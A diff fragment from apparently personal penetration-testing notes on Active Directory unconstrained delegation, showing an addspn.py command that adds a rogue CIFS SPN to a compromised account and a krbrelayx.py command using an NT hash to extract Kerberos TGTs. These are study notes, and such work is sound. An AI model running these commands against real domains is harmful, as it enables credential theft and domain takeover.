AhmedHosniFahmi/Security_notes/Penetration_Testing/AD/Delegations/Unconstrained.md

 # Craft SPN on the Target User
 # --target-type: [samname (for attacking a user)] - [hostname (for attacking a host /default)]
 # -t (the compromised user that has unconstrained delegation set)
-$ addspn.py -u corp.local\\user0 -p password --target-type samname -t vulnerableAccount -s CIFS/rogue.corp.local dc01.corp.local
+$ addspn.py -u corp.local\\user0 -p password --target-type samname -t vulnerableAccount(B) -s CIFS/rogue.corp.local dc01.corp.local

 # Use krbrelayx.py with the compromised account NT hash to decrypt the received TGS to extract the target TGT.
 $ sudo python krbrelayx.py -hashes :cf3a5525ee9414229e66279623ed5c58